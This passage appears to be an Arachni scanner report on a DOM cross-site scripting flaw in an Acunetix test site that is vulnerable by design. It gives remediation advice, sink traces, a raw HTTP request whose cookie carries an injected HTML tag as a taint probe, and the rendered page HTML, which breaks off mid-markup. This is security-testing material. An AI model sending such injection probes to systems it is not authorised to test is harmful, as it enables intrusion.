_arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // 
Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html>
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Unlike traditional Cross-Site Scripting (XSS), where the client is able to inject scripts into a request and have the server return the script to the client, DOM XSS does not require that a request be sent to the server and may be abused entirely within the loaded page.
This occurs when elements of the DOM (known as the sources) are able to be manipulated to contain untrusted data, which the client-side scripts (known as the sinks) use or execute in an unsafe way.
Arachni has discovered that by inserting an HTML element into the page's DOM inputs (sources), it was possible to have that HTML element rendered as part of the page by the sink.
Client-side document rewriting, redirection, or other sensitive actions using untrusted data should be avoided wherever possible, as these may not be inspected by server-side filtering.
To remedy DOM XSS vulnerabilities where these sensitive document actions must be used, it is essential to use document.createElement, element.setAttribute, element.appendChild, etc. to build dynamic interfaces, as opposed to HTML rendering methods such as document.write, document.writeln, element.innerHTML or element.outerHTML.
Vector: cookie_dom input username using GET at http://testhtml5.vulnweb.com/login pointing to http://testhtml5.vulnweb.com/.
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
| cookie_dom | http://testhtml5.vulnweb.com/login | http://testhtml5.vulnweb.com/ | username=admin; Path=/ | |
Transitions describe the steps required to restore the page to the state it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options |
|---|---|---|---|---|
| 0 | 9.163898 | load | page | |
| 1 | 3.86217 | request | http://testhtml5.vulnweb.com/ | |
| 2 | 3.554117 | request | http://testhtml5.vulnweb.com/static/app/services/itemsService.js | |
| 3 | 0.30496 | request | http://testhtml5.vulnweb.com/ajax/popular?offset=0 | |
| 4 | 0.812222 | request | http://testhtml5.vulnweb.com/static/app/partials/itemsList.html | |
| 5 | 0.570796 | request | http://testhtml5.vulnweb.com/static/scr/default.png | |
| 6 | 0.800369 | click | `<a href="#/archive" data-arachni-id="916551842">` | |
| 7 | 0.355032 | request | http://testhtml5.vulnweb.com/static/app/partials/archive.html | |
| 8 | 0.250829 | request | http://testhtml5.vulnweb.com/ajax/archive | |
| 9 | 10.123394 | load | page | |
Data-flow sinks track the flow of the injected taint through key points in the Javascript environment of the page. Each sink is a function which was passed tainted arguments.
Taint is: xss_dom_0c25785427908905790d3a663dc49fa7
| # | Object | Function |
|---|---|---|
| 0 | Window | unescape() |
| 1 | jQuery | c() |
| 2 | jQuery | (e) |
| 3 | Window | unescape() |
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: username=admin<xss_dom_0c25785427908905790d3a663dc49fa7/>
Accept-Language: en-US,*
Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:58:43 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"xss_dom_0c25785427908905790d3a663dc49fa7":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
Welcome <b>admin<xss_dom_0c25785427908905790d3a663dc49fa7/></b> | <a href='/logout'>Logout</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="-1412534057"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"xss_dom_0c25785427908905790d3a663dc49fa7":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" 
href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> Welcome <b>admin<xss_dom_0c25785427908905790d3a663dc49fa7></xss_dom_0c25785427908905790d3a663dc49fa7></b> | <a href="/logout" data-arachni-id="-2013462102">Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> 
</div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> 
</div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" 
href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" 
ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> 
</div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. 
<br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in 
